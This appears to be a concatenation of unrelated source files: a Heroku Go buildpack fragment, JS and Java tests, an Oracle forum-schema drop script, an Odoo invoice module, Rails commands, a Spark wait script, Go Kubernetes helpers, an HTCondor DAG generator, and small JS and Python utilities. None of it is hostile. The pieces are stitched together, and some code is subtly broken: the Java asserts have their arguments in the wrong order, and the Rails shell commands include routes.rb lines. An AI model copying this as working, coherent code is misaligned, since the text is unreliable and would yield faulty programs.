        warn ""
        warn "Run 'heroku config:set GOVERSION=goX.Y' to set the Go version to use"
        warn "for future builds"
        warn ""
    fi
    ver=${GOVERSION:-$DefaultGoVersion}
}

# Detect which Go dependency tool the app uses (godep, govendor, glide or gb)
# and set TOOL, name and ver accordingly.  warnGoVersionOverride is defined
# elsewhere in the buildpack.
determineTool() {
    if test -f "${godepsJSON}"
    then
        TOOL="godep"
        step "Checking Godeps/Godeps.json file."
        # jq round-trip as a cheap JSON syntax check.
        if ! jq -r . < "${godepsJSON}" > /dev/null
        then
            err "Bad Godeps/Godeps.json file"
            exit 1
        fi
        name=$(<${godepsJSON} jq -r .ImportPath)
        ver=${GOVERSION:-$(<${godepsJSON} jq -r .GoVersion)}
        warnGoVersionOverride
    elif test -f "${vendorJSON}"
    then
        TOOL="govendor"
        step "Checking vendor/vendor.json file."
        if ! jq -r . < "${vendorJSON}" > /dev/null
        then
            err "Bad vendor/vendor.json file"
            exit 1
        fi
        name=$(<${vendorJSON} jq -r .rootPath)
        if [ "$name" = "null" -o -z "$name" ]
        then
            err "The 'rootPath' field is not specified in 'vendor/vendor.json'."
            err "'rootPath' must be set to the root package name used by your repository."
            err "Recent versions of govendor add this field automatically, please upgrade"
            err "and re-run 'govendor init'."
            err ""
            err "For more details see: https://devcenter.heroku.com/articles/go-apps-with-govendor#build-configuration"
            exit 1
        fi
        ver=${GOVERSION:-$(<${vendorJSON} jq -r .heroku.goVersion)}
        warnGoVersionOverride
        if [ "${ver}" = "null" -o -z "${ver}" ]
        then
            ver=${DefaultGoVersion}
            warn "The 'heroku.goVersion' field is not specified in 'vendor/vendor.json'."
            warn ""
            warn "Defaulting to ${ver}"
            warn ""
            warn "For more details see: https://devcenter.heroku.com/articles/go-apps-with-govendor#build-configuration"
            warn ""
        fi
    elif test -f "${glideYAML}"
    then
        TOOL="glide"
        setGoVersionFromEnvironment
    # gb layout: at least one .go file nested under src/.
    elif (test -d "$build/src" && test -n "$(find "$build/src" -mindepth 2 -type f -name '*.go' | sed 1q)")
    then
        TOOL="gb"
        setGoVersionFromEnvironment
    else
        err "Godep, GB or govendor are required. For instructions:"
        err "https://devcenter.heroku.com/articles/go-support"
        exit 1
    fi
}
import assert from 'assert'; import {Datetime, datetime} from "../src"; import '../src/plugins/hour12'; import '../src/plugins/century'; import '../src/plugins/dayofyear'; import '../src/plugins/isleapyear'; import '../src/plugins/weeknumber'; import '../src/plugins/iso'; import '../src/plugins/timezone'; import '../src/plugins/transform'; import '../src/plugins/strftime'; describe('Datetime test template', function() { it ('Should be true', () => { assert.strictEqual(datetime("2020-12-21").strftime(), '2020-12-21T02:00:00.000+02:00'); }) it ('Should be true', () => { assert.strictEqual(datetime("2020-12-21").strftime("%d-%m-%Y"), '21-12-2020'); }) it ('Should be true', () => { assert.strictEqual(datetime("2020-12-21").strftime("%d-%m-%Y %1"), '21-12-2020 %1'); }) })
-- Oracle (sqlplus) teardown script for the forum module schema.
-- Drops every B_FORUM* table and its backing sequence.
-- CASCADE CONSTRAINTS removes dependent foreign-key constraints so the drop
-- order does not matter; each statement is executed by the `/` terminator.
-- NOTE(review): DROP is not wrapped in an existence check, so statements for
-- objects that are already gone will report ORA- errors — presumably this
-- uninstall script is expected to be run on a fully installed schema.
DROP TABLE B_FORUM_SMILE CASCADE CONSTRAINTS
/
DROP SEQUENCE sq_B_FORUM_SMILE
/
DROP TABLE B_FORUM CASCADE CONSTRAINTS
/
DROP SEQUENCE sq_B_FORUM
/
DROP TABLE B_FORUM_TOPIC CASCADE CONSTRAINTS
/
DROP SEQUENCE sq_B_FORUM_TOPIC
/
DROP TABLE B_FORUM_MESSAGE CASCADE CONSTRAINTS
/
DROP SEQUENCE sq_B_FORUM_MESSAGE
/
DROP TABLE B_FORUM_FILE CASCADE CONSTRAINTS
/
DROP SEQUENCE SQ_B_FORUM_FILE
/
DROP TABLE B_FORUM_USER CASCADE CONSTRAINTS
/
DROP SEQUENCE sq_B_FORUM_USER
/
DROP TABLE B_FORUM_PERMS CASCADE CONSTRAINTS
/
DROP SEQUENCE sq_B_FORUM_PERMS
/
DROP TABLE B_FORUM_SUBSCRIBE CASCADE CONSTRAINTS
/
DROP SEQUENCE sq_B_FORUM_SUBSCRIBE
/
DROP TABLE B_FORUM_RANK CASCADE CONSTRAINTS
/
DROP SEQUENCE SQ_B_FORUM_RANK
/
DROP TABLE B_FORUM_RANK_LANG CASCADE CONSTRAINTS
/
DROP SEQUENCE SQ_B_FORUM_RANK_LANG
/
DROP TABLE B_FORUM_GROUP CASCADE CONSTRAINTS
/
DROP SEQUENCE SQ_B_FORUM_GROUP
/
DROP TABLE B_FORUM_GROUP_LANG CASCADE CONSTRAINTS
/
DROP SEQUENCE SQ_B_FORUM_GROUP_LANG
/
DROP TABLE B_FORUM_SMILE_LANG CASCADE CONSTRAINTS
/
DROP SEQUENCE SQ_B_FORUM_SMILE_LANG
/
DROP TABLE B_FORUM_POINTS CASCADE CONSTRAINTS
/
DROP SEQUENCE SQ_B_FORUM_POINTS
/
-- The *_LANG, points2post and remaining tables below have no dropped sequence
-- of their own except where listed.
DROP TABLE B_FORUM_POINTS_LANG CASCADE CONSTRAINTS
/
DROP TABLE B_FORUM_POINTS2POST CASCADE CONSTRAINTS
/
DROP SEQUENCE SQ_B_FORUM_POINTS2POST
/
DROP TABLE B_FORUM_USER_POINTS CASCADE CONSTRAINTS
/
DROP TABLE B_FORUM2SITE CASCADE CONSTRAINTS
/
DROP TABLE B_FORUM_PM_FOLDER CASCADE CONSTRAINTS
/
DROP TABLE B_FORUM_PRIVATE_MESSAGE CASCADE CONSTRAINTS
/
DROP TABLE B_FORUM_FILTER CASCADE CONSTRAINTS
/
DROP TABLE B_FORUM_DICTIONARY CASCADE CONSTRAINTS
/
DROP TABLE B_FORUM_LETTER CASCADE CONSTRAINTS
/
DROP TABLE B_FORUM_USER_TOPIC CASCADE CONSTRAINTS
/
DROP TABLE B_FORUM_USER_FORUM CASCADE CONSTRAINTS
/
DROP TABLE B_FORUM_STAT CASCADE CONSTRAINTS
/
DROP TABLE B_FORUM_EMAIL CASCADE CONSTRAINTS
/
-- Remaining sequences for the tables dropped just above.
DROP SEQUENCE SQ_B_FORUM_PM_FOLDER
/
DROP SEQUENCE SQ_B_FORUM_PRIVATE_MESSAGE
/
DROP SEQUENCE SQ_B_FORUM_FILTER
/
DROP SEQUENCE SQ_B_FORUM_DICTIONARY
/
DROP SEQUENCE SQ_B_FORUM_LETTER
/
DROP SEQUENCE SQ_B_FORUM_USER_TOPIC
/
DROP SEQUENCE SQ_B_FORUM_STAT
/
DROP SEQUENCE SQ_B_FORUM_USER_FORUM
/
DROP SEQUENCE SQ_B_FORUM_EMAIL
/
import org.json.JSONArray; import org.json.JSONObject; import org.junit.Assert; public class SearchAnalyzer { private static final String M4_URL = "https://example.com"; // Replace with the actual URL public static void main(String[] args) { String keyword = "qq"; String url = M4_URL + "/search/getSearchResult_newJson.htm?keyWord=" + keyword + "&p=undefined"; String result = getHttpResponse4Get(url); try { if (!result.isEmpty()) { JSONObject re = new JSONObject(result); JSONArray app = re.getJSONArray("appDetails"); // Check if search results are not empty Assert.assertTrue(app.length() != 0, "Search result is empty!!"); // Check if the number of search results falls within the specified range Assert.assertTrue(app.length() <= 50 && app.length() > 20, "Search results for keyword 'qq' have a length of: " + app.length()); } else { System.out.println("Empty response received from the server."); } } catch (Exception e) { System.out.println("An error occurred while processing the search results: " + e.getMessage()); } } // Simulated HTTP GET request function private static String getHttpResponse4Get(String url) { // Implement the logic to make an HTTP GET request and return the response as a string // This can be achieved using libraries like Apache HttpClient or HttpURLConnection // For simplicity, we can simulate the response for demonstration purposes return "{\"appDetails\": [{\"name\": \"App1\"}, {\"name\": \"App2\"}]}"; } }
# -*- coding: utf-8 -*-
##############################################################################
#
#    Copyright (C) 2016 Pambudi Satria (<https://github.com/pambudisatria>).
#    @author Pambudi Satria <pambudi.satria@yahoo.com>
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as
#    published by the Free Software Foundation, either version 3 of the
#    License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################

from openerp import fields, models, api
from openerp.osv import osv
import openerp.addons.decimal_precision as dp


class account_invoice_line(models.Model):
    """Extend invoice lines with shipping/insurance/packing extra costs.

    Overrides the subtotal computation so that the per-line extras
    (extra_shipping_cost, insurance_fee, admcost_insurance, packing_cost)
    are taxed and folded into ``price_subtotal``.
    """

    _inherit = "account.invoice.line"

    @api.one
    @api.depends('price_unit', 'discount', 'invoice_line_tax_id', 'quantity',
        'product_id', 'invoice_id.partner_id', 'invoice_id.currency_id')
    def _compute_price(self):
        """Compute price_subtotal including the extra-cost components.

        Each extra cost is run through the line's taxes with quantity 1,
        then the tax-engine totals are summed and rounded in the invoice
        currency.
        """
        # Unit price net of the line discount.
        price = self.price_unit * (1 - (self.discount or 0.0) / 100.0)
        # Base line amount through the tax engine.
        taxes = self.invoice_line_tax_id.compute_all(price, self.quantity, product=self.product_id, partner=self.invoice_id.partner_id)
        # Each extra cost is taxed independently with quantity 1.
        tax_extra_ship_cost = self.invoice_line_tax_id.compute_all(self.extra_shipping_cost, 1, product=self.product_id, partner=self.invoice_id.partner_id)
        tax_insurance_fee = self.invoice_line_tax_id.compute_all(self.insurance_fee, 1, product=self.product_id, partner=self.invoice_id.partner_id)
        tax_admcost_insurance = self.invoice_line_tax_id.compute_all(self.admcost_insurance, 1, product=self.product_id, partner=self.invoice_id.partner_id)
        tax_packing_cost = self.invoice_line_tax_id.compute_all(self.packing_cost, 1, product=self.product_id, partner=self.invoice_id.partner_id)
        # 'total' from compute_all is the tax-excluded/included total per
        # the tax configuration; sum all components into the subtotal.
        self.price_subtotal = taxes['total'] + tax_extra_ship_cost['total'] + tax_insurance_fee['total'] + tax_admcost_insurance['total'] + tax_packing_cost['total']
        if self.invoice_id:
            # Round in the invoice currency for display/accounting consistency.
            self.price_subtotal = self.invoice_id.currency_id.round(self.price_subtotal)

    def _compute_insurance_fee(self):
        # NOTE(review): this computes 0.2% of insurance_value into a local
        # variable that is never assigned to self.insurance_fee and the method
        # has no @api.depends decorator — it looks unfinished/dead. Confirm
        # whether it should write ``self.insurance_fee = ...``.
        insurance_fee = self.insurance_value*((0.2)/100)

    # Extra per-line cost fields, all using the Product Price precision.
    extra_shipping_cost = fields.Float(string='Extra Shipping Cost', digits= dp.get_precision('Product Price'), default=0.0)
    insurance_value = fields.Float(string='Insurance Value', digits= dp.get_precision('Product Price'), default=0.0)
    insurance_fee = fields.Float(string='Insurance Fee', digits= dp.get_precision('Product Price'), default=0.0)
    admcost_insurance = fields.Float(string='Cost Administration of Insurance', digits= dp.get_precision('Product Price'), default=0.0)
    packing_cost = fields.Float(string='Packing Cost', digits= dp.get_precision('Product Price'), default=0.0)


class account_invoice_tax(models.Model):
    """Extend tax-line computation to also tax the extra cost components."""

    _inherit = "account.invoice.tax"

    @api.v8
    def compute(self, invoice):
        """Build grouped tax values for *invoice*, including extra costs.

        Returns a dict keyed by (tax_code_id, base_code_id, account_id)
        mapping to the accumulated tax-line values, rounded in the
        invoice currency.
        """
        tax_grouped = {}
        # Currency fixed at the invoice date for conversions below.
        currency = invoice.currency_id.with_context(date=invoice.date_invoice or fields.Date.context_today(invoice))
        company_currency = invoice.company_id.currency_id
        for line in invoice.invoice_line:
            # Mirror of account_invoice_line._compute_price: base amount plus
            # each extra cost taxed with quantity 1.
            taxes = line.invoice_line_tax_id.compute_all(
                (line.price_unit * (1 - (line.discount or 0.0) / 100.0)),
                line.quantity, line.product_id, invoice.partner_id)['taxes']
            taxes += line.invoice_line_tax_id.compute_all(
                line.extra_shipping_cost, 1, line.product_id, invoice.partner_id)['taxes']
            taxes += line.invoice_line_tax_id.compute_all(
                line.insurance_fee, 1, line.product_id, invoice.partner_id)['taxes']
            taxes += line.invoice_line_tax_id.compute_all(
                line.admcost_insurance, 1, line.product_id, invoice.partner_id)['taxes']
            taxes += line.invoice_line_tax_id.compute_all(
                line.packing_cost, 1, line.product_id, invoice.partner_id)['taxes']
            for tax in taxes:
                val = {
                    'invoice_id': invoice.id,
                    'name': tax['name'],
                    'amount': tax['amount'],
                    'manual': False,
                    'sequence': tax['sequence'],
                    'base': currency.round(tax['price_unit'] * line['quantity']),
                }
                if invoice.type in ('out_invoice','in_invoice'):
                    # Regular invoices use the collected-side codes/signs.
                    val['base_code_id'] = tax['base_code_id']
                    val['tax_code_id'] = tax['tax_code_id']
                    val['base_amount'] = currency.compute(val['base'] * tax['base_sign'], company_currency, round=False)
                    val['tax_amount'] = currency.compute(val['amount'] * tax['tax_sign'], company_currency, round=False)
                    val['account_id'] = tax['account_collected_id'] or line.account_id.id
                    val['account_analytic_id'] = tax['account_analytic_collected_id']
                else:
                    # Refunds use the ref_* (paid-side) codes/signs.
                    val['base_code_id'] = tax['ref_base_code_id']
                    val['tax_code_id'] = tax['ref_tax_code_id']
                    val['base_amount'] = currency.compute(val['base'] * tax['ref_base_sign'], company_currency, round=False)
                    val['tax_amount'] = currency.compute(val['amount'] * tax['ref_tax_sign'], company_currency, round=False)
                    val['account_id'] = tax['account_paid_id'] or line.account_id.id
                    val['account_analytic_id'] = tax['account_analytic_paid_id']

                # If the taxes generate moves on the same financial account as the invoice line
                # and no default analytic account is defined at the tax level, propagate the
                # analytic account from the invoice line to the tax line. This is necessary
                # in situations were (part of) the taxes cannot be reclaimed,
                # to ensure the tax move is allocated to the proper analytic account.
                if not val.get('account_analytic_id') and line.account_analytic_id and val['account_id'] == line.account_id.id:
                    val['account_analytic_id'] = line.account_analytic_id.id

                # Accumulate per (tax code, base code, account) group.
                key = (val['tax_code_id'], val['base_code_id'], val['account_id'])
                if not key in tax_grouped:
                    tax_grouped[key] = val
                else:
                    tax_grouped[key]['base'] += val['base']
                    tax_grouped[key]['amount'] += val['amount']
                    tax_grouped[key]['base_amount'] += val['base_amount']
                    tax_grouped[key]['tax_amount'] += val['tax_amount']

        # Round accumulated totals once at the end to avoid per-line drift.
        for t in tax_grouped.values():
            t['base'] = currency.round(t['base'])
            t['amount'] = currency.round(t['amount'])
            t['base_amount'] = currency.round(t['base_amount'])
            t['tax_amount'] = currency.round(t['tax_amount'])
        return tax_grouped
# Generate the Rails app rails new my_app # Create the models rails generate model user name:string email:string rails generate model product name:string description:text price:decimal rails generate model category name:string # Generate controller and views rails generate controller users rails generate controller products rails generate controller categories # Create the database rake db:create rake db:migrate # Create routes resources :users resources :products resources :categories
# Block until the Spark/Hadoop restore marker file appears, printing a
# progress dot every 3 seconds, then print the cluster endpoint summary.
printf "Waiting for Spark to initialize..."
until [ -f /tmp/hadoop-root/restore_complete ]; do
    sleep 3
    printf "."
done
echo ""
echo "##############"
echo "Spark Ready"
echo "Cluster http://localhost:8084"
echo "Thrift application http://localhost:8085"
echo "History http://localhost:8086"
echo "HDFS browser http://localhost:8087"
echo "Worker http://localhost:8088"
echo "Thrift JDBC jdbc:hive2://localhost:5434"
echo "##############"
package framework

import (
	"encoding/json"
	"fmt"
	"io/ioutil"
	"net/http"

	"github.com/ghodss/yaml"
	"github.com/rh-messaging/shipshape/pkg/framework/log"
	v1 "k8s.io/apimachinery/pkg/apis/meta/v1"
	"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
	"k8s.io/apimachinery/pkg/runtime/schema"
)

// ResourceType enumerates the well-known resource kinds the framework can
// address through the dynamic client without spelling out a GroupVersionResource.
type ResourceType int

const (
	Issuers ResourceType = iota
	Certificates
	Deployments
)

var (
	// resourceMap translates each known ResourceType to the
	// GroupVersionResource the dynamic client needs.
	resourceMap = map[ResourceType]schema.GroupVersionResource{
		Issuers: {
			Group:    "certmanager.k8s.io",
			Version:  "v1alpha1",
			Resource: "issuers",
		},
		Certificates: {
			Group:    "certmanager.k8s.io",
			Version:  "v1alpha1",
			Resource: "certificates",
		},
		Deployments: {Group: "apps", Version: "v1", Resource: "deployments"},
	}
)

// GetResource returns the given resource type, identified by its given name
func (c *ContextData) GetResource(resourceType ResourceType, name string) (*unstructured.Unstructured, error) {
	return c.Clients.DynClient.Resource(resourceMap[resourceType]).Namespace(c.Namespace).Get(name, v1.GetOptions{})
}

// GetResourceGroupVersion returns the named resource for an arbitrary
// GroupVersionResource not covered by resourceMap.
func (c *ContextData) GetResourceGroupVersion(gv schema.GroupVersionResource, name string) (*unstructured.Unstructured, error) {
	return c.Clients.DynClient.Resource(gv).Namespace(c.Namespace).Get(name, v1.GetOptions{})
}

// ListResources returns a list of resources found in the related Framework's namespace,
// for the given resource type
func (c *ContextData) ListResources(resourceType ResourceType) (*unstructured.UnstructuredList, error) {
	return c.Clients.DynClient.Resource(resourceMap[resourceType]).Namespace(c.Namespace).List(v1.ListOptions{})
}

// ListResourcesGroupVersion lists resources in the Framework's namespace for
// an arbitrary GroupVersionResource.
func (c *ContextData) ListResourcesGroupVersion(gv schema.GroupVersionResource) (*unstructured.UnstructuredList, error) {
	return c.Clients.DynClient.Resource(gv).Namespace(c.Namespace).List(v1.ListOptions{})
}

// CreateResource creates a resource based on provided (known) resource type and unstructured data
func (c *ContextData) CreateResource(resourceType ResourceType, obj *unstructured.Unstructured, options v1.CreateOptions, subresources ...string) (*unstructured.Unstructured, error) {
	return c.Clients.DynClient.Resource(resourceMap[resourceType]).Namespace(c.Namespace).Create(obj, options, subresources...)
}

// CreateResourceGroupVersion creates a resource for an arbitrary GroupVersionResource.
func (c *ContextData) CreateResourceGroupVersion(gv schema.GroupVersionResource, obj *unstructured.Unstructured, options v1.CreateOptions, subresources ...string) (*unstructured.Unstructured, error) {
	return c.Clients.DynClient.Resource(gv).Namespace(c.Namespace).Create(obj, options, subresources...)
}

// DeleteResource deletes a resource based on provided (known) resource type and name
func (c *ContextData) DeleteResource(resourceType ResourceType, name string, options v1.DeleteOptions, subresources ...string) error {
	return c.Clients.DynClient.Resource(resourceMap[resourceType]).Namespace(c.Namespace).Delete(name, &options, subresources...)
}

// DeleteResourceGroupVersion deletes the named resource for an arbitrary GroupVersionResource.
func (c *ContextData) DeleteResourceGroupVersion(gv schema.GroupVersionResource, name string, options v1.DeleteOptions, subresources ...string) error {
	return c.Clients.DynClient.Resource(gv).Namespace(c.Namespace).Delete(name, &options, subresources...)
}

// LoadYamlFromUrl fetches a YAML document over HTTP and decodes it into an
// unstructured Kubernetes object.
func LoadYamlFromUrl(url string) (*unstructured.Unstructured, error) {
	var unsObj unstructured.Unstructured
	resp, err := http.Get(url) //load yaml body from url
	if err != nil {
		log.Logf("error during loading %s: %v", url, err)
		return nil, err
	}
	defer resp.Body.Close()
	// FIX: previously a non-2xx response (e.g. a 404 HTML error page) was
	// silently passed to the YAML parser, producing a confusing parse error
	// or, worse, a bogus object. Fail fast on unexpected status codes.
	if resp.StatusCode != http.StatusOK {
		err := fmt.Errorf("unexpected HTTP status %d while fetching %s", resp.StatusCode, url)
		log.Logf("error during loading %s: %v", url, err)
		return nil, err
	}
	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		log.Logf("error during loading %s: %v", url, err)
		return nil, err
	}
	// Convert YAML to JSON first so encoding/json can unmarshal into the
	// unstructured object's map representation.
	jsonBody, err := yaml.YAMLToJSON(body)
	if err != nil {
		log.Logf("error during parsing %s: %v", url, err)
		return nil, err
	}
	err = json.Unmarshal(jsonBody, &unsObj)
	return &unsObj, err
}
#!/bin/bash
# FIX: shebang was #!/bin/sh, but the script uses bash-only features —
# brace expansion {1..8000} and (( )) arithmetic — which fail under a POSIX
# sh (e.g. dash). It must run under bash.
#
# Emit an HTCondor DAG (to stdout) with one detector-simulation job per
# photon file, wiring up input photon, output detector and background files.

jobname_D='D'
f='NuE'
s=22
e='low_energy'
y='IC86_flasher_p1=0.3_p2=1.0'
p='photon_spice3_2'
phot='mcpe'
domeff=0.99
domos=1
holeice='flasher_p1=0.3_p2=1.0'

for i in {1..8000}
do
    # Input files are grouped 1000 per subdirectory: j is the subdirectory
    # index (1-based), l is the file's index within that subdirectory.
    (( j = i / 1000 + 1 ))
    (( l = i - (j - 1) * 1000 ))
    JOBID_D=$jobname_D$i
    echo JOB $JOBID_D detector_mcpe.condor
    phofile="/data/ana/Cscd/StartingEvents/NuGen_new/$f/$e/$p/$j/photon_`printf %08d $i`.i3.zst"
    detfile="/data/ana/Cscd/StartingEvents/NuGen_new/$f/$e/$y/detector/$j/det_`printf %08d $i`.i3.zst"
    bgfile="/data/ana/Cscd/StartingEvents/CORSIKA_bg/12531/"$phot"_spice3_2/1/"$phot"_0000`printf %04d $l`.i3.zst"
    echo VARS $JOBID_D seed=\"$s\" runnumber=\"$i\" infile=\"$phofile\" outfile=\"$detfile\" bgfile=\"$bgfile\" hi=\"$holeice\" domeff=\"$domeff\" domos=\"$domos\"
    # Allow each job to be retried twice on failure.
    echo Retry $JOBID_D 2
done
/**
 * @author <NAME> <<EMAIL>>
 * @copyright 2020 Photon Storm Ltd.
 * @license {@link https://opensource.org/licenses/MIT|MIT License}
 */

/**
 * Retrieves the value of the given key from an object.
 *
 * @function Phaser.Tweens.Builders.GetBoolean
 * @since 3.0.0
 *
 * @param {object} source - The object to retrieve the value from.
 * @param {string} key - The key to look for in the `source` object.
 * @param {*} defaultValue - The default value to return if the `key` doesn't exist or if no `source` object is provided.
 *
 * @return {*} The retrieved value.
 */
var GetBoolean = function (source, key, defaultValue)
{
    // Fall back to the default when there is no source object at all, or
    // when the key is not an own property of it.
    return (source && source.hasOwnProperty(key)) ? source[key] : defaultValue;
};

module.exports = GetBoolean;
def z_score_normalization(arr):
    """Standardize *arr* to zero mean and unit variance (z-scores).

    Uses the population standard deviation (divides by ``len(arr)``,
    not ``len(arr) - 1``), matching the original implementation.

    Args:
        arr: A non-empty sequence of numbers containing at least two
            distinct values.

    Returns:
        list[float]: ``(x - mean) / std_dev`` for each ``x`` in *arr*.

    Raises:
        ValueError: If *arr* is empty, or if every element is identical
            (standard deviation of zero), instead of the opaque
            ZeroDivisionError the original raised in those cases.
    """
    if not arr:
        raise ValueError("cannot normalize an empty sequence")
    mean = sum(arr) / len(arr)
    # Population variance: mean of squared deviations.
    std_dev = (sum((x - mean) ** 2 for x in arr) / len(arr)) ** 0.5
    if std_dev == 0:
        raise ValueError("standard deviation is zero: all values are identical")
    return [(x - mean) / std_dev for x in arr]